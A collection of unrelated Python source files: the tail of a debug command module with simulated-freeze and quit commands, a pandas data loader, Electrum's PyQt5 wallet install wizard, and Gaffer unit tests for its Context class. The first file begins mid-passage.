out="pid{}_time{}_nonce{}\n".format(os.getpid(), now, nonce)
#print("PONG! Writing {} to {}".format(out, pongfile))
f.write(out)
f.flush()
import time
@register_command
def freeze_forever():
cmdr = commands()
if cmdr.frozen:
print("Already frozen.")
return
prev = cmdr.frozen
cmdr.frozen = True
print('Simulating a freeze; going into an infinite loop:')
prev=time.time()
try:
while not should_quit():
elapsed=time.time() - prev
print('Frozen for {}s'.format(elapsed))
time.sleep(1)
check_commands()
finally:
cmdr.frozen = prev
_quit = False
import sys
import posix
state.quit_immediately = True
@register_command
def quit():
global _quit
if _quit or state.quit_immediately:
posix._exit(1)
else:
_quit = True
@register_command
def quit_immediately():
posix._exit(1)
def should_quit():
return _quit
@register_command
def throw_exception():
raise Exception("This exception should be caught and logged by the tflex command system")
|
model.py
|
import pandas as pd
from sachima import conf
import os
import importlib
from sachima.params import set_sql_params
from sachima.log import logger
from sachima.wrappers import timer
# from tqdm import tqdm
import io
import time
import logging
import sys
import threading
import itertools
@timer
def sql(sql, datatype):
"""
return DataFrame
"""
logger.info("running sql {}".format(sql))
return pd.read_sql(sql, datatype)
class Data:
def __init__(self, dataname, datatype, params, prefunc):
"""
dataname: sql filename
datatype: db engine or filetype in str
"""
self.source = dataname
self.type = datatype
title = dataname + " | " + str(datatype)
logger.info("=" * 12 + " " + title + " " + "=" * 12)
if datatype in ("xls", "xlsx"):
self.data = pd.read_excel(
os.path.join(conf.get("PROJ_DIR"), dataname)
)
elif datatype in ("csv", "txt"):
self.data = pd.read_csv(
os.path.join(conf.get("PROJ_DIR"), dataname)
)
elif datatype in ("api",):
api_cls = importlib.import_module(
"services." + dataname, package=".."
)
api = api_cls.Api()
self.data = api.data
elif datatype in ("json",):
self.data = pd.read_json(
os.path.join(conf.get("PROJ_DIR"), dataname)
)
else:
# read sql file from ./sqls
str_sql = open(
os.path.join(conf.get("PROJ_DIR"), "sqls", dataname),
encoding="utf-8",
).read()
sql = str_sql
# pre process before sql loaded
if prefunc:
sql = prefunc(set_sql_params(str_sql, params), params)
else:
sql = set_sql_params(str_sql, params)
self.data = _get_df(sql, datatype, dataname)
def animate(dataname, log):
t = threading.currentThread()
elapsed_time = 0
for c in itertools.cycle(["|", "/", "-", "\\"]):
if getattr(t, "Done", True):
break
sys.stdout.write(
"\r<{}> running {} {} ms\r".format(dataname, c, elapsed_time)
)
sys.stdout.flush()
time.sleep(0.1)
elapsed_time += 100
# log("<{}> parsing elapsed time: {} ms".format(dataname, elapsed_time))
log("\r")
# sys.stdout.write("\r\n Done! ")
def _get_df(sql, datatype, dataname):
animate_thread = threading.Thread(
target=animate, args=(dataname, logger.info)
)
animate_thread.daemon = True
animate_thread.Done = False
animate_thread.start()
try:
start = time.time()
df = pd.read_sql(sql, datatype)
consumed_time = time.time() - start
logger.info("<{}> time: {} secs".format(dataname, consumed_time))
except Exception as e:
raise e
finally:
animate_thread.Done = True # no matter how break the animate loop
# logger.info("<{}> start loading data... ".format(dataname))
# # df = pd.concat(first + [chunk for chunk in tqdm(chunks, total=200)])
# logger.info(
# "<{}> loading data elapsed time: {} seconds".format(
# dataname, loading_data_elapsed_time
# )
# )
return df
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.assertTrue( context.isSame( c ) )
changes.append( ( name, context.get( name, None ), context.hash() ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
hash1 = c.hash()
self.assertEqual( changes, [ ( "a", 2, hash1 ) ] )
c["a"] = 3
hash2 = c.hash()
self.assertEqual( changes, [ ( "a", 2, hash1 ), ( "a", 3, hash2 ) ] )
c["b"] = 1
hash3 = c.hash()
self.assertEqual( changes, [ ( "a", 2, hash1 ), ( "a", 3, hash2 ), ( "b", 1, hash3 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2, hash1 ), ( "a", 3, hash2 ), ( "b", 1, hash3 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
hash4 = c.hash()
self.assertEqual( changes, [ ( "a", None, hash4 ) ] )
del c["b"]
hash5 = c.hash()
self.assertEqual( changes, [ ( "a", None, hash4 ), ( "b", None, hash5 ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.assertIsInstance( c["int"], int )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.assertIsInstance( c["float"], float )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.assertIsInstance( c["string"], str )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertIsInstance( c["v2i"], imath.V2i )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertIsInstance( c["v3i"], imath.V3i )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertIsInstance( c["v2f"], imath.V2f )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertIsInstance( c["v3f"], imath.V3f )
def testSwitchTypes( self ) :
c = Gaffer.Context()
c["x"] = 1
self.assertEqual( c["x"], 1 )
self.assertEqual( c.get( "x" ), 1 )
c.set( "x", 2 )
self.assertEqual( c["x"], 2 )
self.assertIsInstance( c["x"], int )
c["x"] = 1.0
self.assertEqual( c["x"], 1.0 )
self.assertEqual( c.get( "x" ), 1.0 )
c.set( "x", 2.0 )
self.assertEqual( c["x"], 2.0 )
self.assertIsInstance( c["x"], float )
c["x"] = "hi"
self.assertEqual( c["x"], "hi" )
self.assertEqual( c.get( "x" ), "hi" )
c.set( "x", "bye" )
self.assertEqual( c["x"], "bye" )
self.assertIsInstance( c["x"], str )
c["x"] = imath.V2i( 1, 2 )
self.assertEqual( c["x"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "x" ), imath.V2i( 1, 2 ) )
c.set( "x", imath.V2i( 1, 2 ) )
self.assertEqual( c["x"], imath.V2i( 1, 2 ) )
self.assertIsInstance( c["x"], imath.V2i )
c["x"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["x"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "x" ), imath.V3i( 1, 2, 3 ) )
c.set( "x", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["x"], imath.V3i( 1, 2, 3 ) )
self.assertIsInstance( c["x"], imath.V3i )
c["x"] = imath.V2f( 1, 2 )
self.assertEqual( c["x"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "x" ), imath.V2f( 1, 2 ) )
c.set( "x", imath.V2f( 1, 2 ) )
self.assertEqual( c["x"], imath.V2f( 1, 2 ) )
self.assertIsInstance( c["x"], imath.V2f )
c["x"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["x"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "x" ), imath.V3f( 1, 2, 3 ) )
c.set( "x", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["x"], imath.V3f( 1, 2, 3 ) )
self.assertIsInstance( c["x"], imath.V3f )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.assertFalse( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.assertFalse( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.assertTrue( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.assertTrue( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def f() :
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.assertFalse( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.assertFalse( c["v"].isSame( v ) )
def testGetFallbackValue( self ) :
c = Gaffer.Context()
self.assertEqual( c.get( "f" ), None )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.assertTrue( w() is c )
with c :
pass
del c
self.assertIsNone( w() )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.assertIsInstance( c, Gaffer.Context )
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "~", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "$a/${b}" )
